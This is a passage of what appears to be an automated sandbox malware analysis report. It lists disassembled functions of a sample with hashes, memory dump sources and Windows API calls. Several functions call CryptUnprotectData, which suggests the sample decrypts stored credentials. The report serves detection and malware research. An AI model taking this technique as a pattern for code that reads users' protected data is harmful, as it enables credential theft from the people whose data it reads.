                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: eed0d37a715755c7c057798a9f70bfce674a096e0d27356d67b5e0a7538fe706
                                  • Instruction ID: a60ace99413e7afb7379f67eccb5655bd0e955a0448941e7ef2ba379164ee1f6
                                  • Opcode Fuzzy Hash: eed0d37a715755c7c057798a9f70bfce674a096e0d27356d67b5e0a7538fe706
                                  • Instruction Fuzzy Hash: 45317571A40624BFD715DB94CC92FEAB7B9DB88B10F108184FA04EB2D0D7B0AE44CB90
                                  Function 00309B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00309B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00309BB3
                                  • LocalFree.KERNEL32(?), ref: 00309BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 3c66a702f908ace804ba0ab6ab27a881c2a3f4498c9863bb9c147d573295cfcf
                                  • Instruction ID: 1e6cd0bf7c5e06884a075dfde48ec40e30f42df616ebc0760eab0ecfe29dd19b
                                  • Opcode Fuzzy Hash: 3c66a702f908ace804ba0ab6ab27a881c2a3f4498c9863bb9c147d573295cfcf
                                  • Instruction Fuzzy Hash: 70011DB5E42309ABE7109BA4DC55FAEB778EB44B00F104555FA04AB381E7B49A04CBE1
                                  Function 006B69D8 Relevance: 4.0, Strings: 2, Instructions: 1533COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,D_$6 i
                                  • API String ID: 0-3871559175
                                  • Opcode ID: a50da02027c8b52d365e64cf77ccd3667ed84717c08099ab240a39214879751c
                                  • Instruction ID: 335314312fad410de139e49cc2fa5700288329e70c70d56894f0410b69804829
                                  • Opcode Fuzzy Hash: a50da02027c8b52d365e64cf77ccd3667ed84717c08099ab240a39214879751c
                                  • Instruction Fuzzy Hash: 75B2E3F3A086049FD304AF29EC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
                                  Function 00647D8B Relevance: 3.9, Strings: 3, Instructions: 161COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D9s=$D9s=$SS&w
                                  • API String ID: 0-234490397
                                  • Opcode ID: a53161ba8a588f5976a9d3bd056e7ee712c6d299a14fa3c299f3c0e5215249c1
                                  • Instruction ID: b19d3ab66fd2cfa1ee4cc20a66265840961e3b3dbde5826a70e834e71d652119
                                  • Opcode Fuzzy Hash: a53161ba8a588f5976a9d3bd056e7ee712c6d299a14fa3c299f3c0e5215249c1
                                  • Instruction Fuzzy Hash: 234126F3E082245FF3106E2DEC8576AB6D6EB94320F1B8539DEC893384E4796C1586C6
                                  Function 0032B100 Relevance: 2.3, Strings: 1, Instructions: 1059COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2
                                  • API String ID: 0-450215437
                                  • Opcode ID: 047ff4036290b2f2e7e27415657e1432574dffd8663c0d72b6e6cbd03c257cc9
                                  • Instruction ID: 035e635dd84550f5b2fce5b1b4ed13f2195d71f2924ce9e92fab8bdba6fc2ccd
                                  • Opcode Fuzzy Hash: 047ff4036290b2f2e7e27415657e1432574dffd8663c0d72b6e6cbd03c257cc9
                                  • Instruction Fuzzy Hash: CF72BF7246D3F05ECB179B75666A0A5FFB0BE23300B6A48CFC4C19A0B3D3449919D75A
                                  Function 005E5358 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (Ap
                                  • API String ID: 0-2128486027
                                  • Opcode ID: 88fb3096302a8e97c32facac6de7595acc62567936d18a8b29d604e425b9c011
                                  • Instruction ID: 14994c42d9b3ece6ae5d695b242a56dedae4cd510488c8fd714fae11321da623
                                  • Opcode Fuzzy Hash: 88fb3096302a8e97c32facac6de7595acc62567936d18a8b29d604e425b9c011
                                  • Instruction Fuzzy Hash: 13516AF3A186049FE304AE2EDC4573AB7E6EFD4710F1A893DDAC4C7744E93598098686
                                  Function 00619C53 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~YK'
                                  • API String ID: 0-2135834153
                                  • Opcode ID: 4a98f1a4f2ea38ccd5ed1d09431f4132f35345dbabd899ea48f34419ae73fa60
                                  • Instruction ID: 28d867187528a3e31a46edd7dcd6b240a6187a6e55ee6cb7e4d7cd6d837c142d
                                  • Opcode Fuzzy Hash: 4a98f1a4f2ea38ccd5ed1d09431f4132f35345dbabd899ea48f34419ae73fa60
                                  • Instruction Fuzzy Hash: 4C5124F3B186149BF708696DECA537AB6D9DB94720F1A413D9A85C3380FC39980582D6
                                  Function 00692CB8 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: S=~m
                                  • API String ID: 0-1458585614
                                  • Opcode ID: 8537c1253b478c2d3f2f36f814ba85493b4387e15793bfb458ea64d7f84cf0d7
                                  • Instruction ID: ae2dd258cf35d1ab3ef5412396cdf3a4001dfbda814f899b60a3b48cae1683ee
                                  • Opcode Fuzzy Hash: 8537c1253b478c2d3f2f36f814ba85493b4387e15793bfb458ea64d7f84cf0d7
                                  • Instruction Fuzzy Hash: E051B3B3A087009FE3046E65DD4537AB7E1EF80310F1A893DDAC897784EA7D48458687
                                  Function 0032B71E Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2
                                  • API String ID: 0-450215437
                                  • Opcode ID: 923d1a84b9059144e7447403205172de4e805ff645d0b7e65502dcfbbd25dd1e
                                  • Instruction ID: 29bc2ffe328f4b92d0ea081a9d37498b7aaefda13ea7dda1eb4102a9efb2116c
                                  • Opcode Fuzzy Hash: 923d1a84b9059144e7447403205172de4e805ff645d0b7e65502dcfbbd25dd1e
                                  • Instruction Fuzzy Hash: BB41A7968CD3D06FD7639F7856B82D67FE44D3B200749A8DEC5C14F662E448920BEB42
                                  Function 0059688A Relevance: .2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 088e002a580dcd63e8f3e522d12d61d859b5f9fcf760dd5383cf5033badd0ebd
                                  • Instruction ID: 5461be93c846fb88543d9e51298891057cfef1621e142499c67b2dc5570dd466
                                  • Opcode Fuzzy Hash: 088e002a580dcd63e8f3e522d12d61d859b5f9fcf760dd5383cf5033badd0ebd
                                  • Instruction Fuzzy Hash: F441C1F39086109BE704AE18EC8577BB7E5EF94720F0A893DDAD587340E63998548B93
                                  Function 006ECE1B Relevance: .1, Instructions: 90COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bab1e43effcb05e563aad413b5b18592ef299387bcbde176ed4b21758843f81
                                  • Instruction ID: a0f5550f739aada1fce9b4d8f8fedfd89242a9d3e665650765827f80e54e8d9b
                                  • Opcode Fuzzy Hash: 1bab1e43effcb05e563aad413b5b18592ef299387bcbde176ed4b21758843f81
                                  • Instruction Fuzzy Hash: 6331F2B290C310EFE312BF29D8816AEFBE5FF98711F06482DDAD483610D73558418A97
                                  Function 003185B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00318636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003186AA
                                  • StrStrA.SHLWAPI(?,0102DEE0), ref: 003186CF
                                  • lstrcpyn.KERNEL32(005393D0,?,00000000), ref: 003186EE
                                  • lstrlen.KERNEL32(?), ref: 00318701
                                  • wsprintfA.USER32 ref: 00318711
                                  • lstrcpy.KERNEL32(?,?), ref: 00318727
                                  • StrStrA.SHLWAPI(?,0102E078), ref: 00318754
                                  • lstrcpy.KERNEL32(?,005393D0), ref: 003187B4
                                  • StrStrA.SHLWAPI(?,0102E048), ref: 003187E1
                                  • lstrcpyn.KERNEL32(005393D0,?,00000000), ref: 00318800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
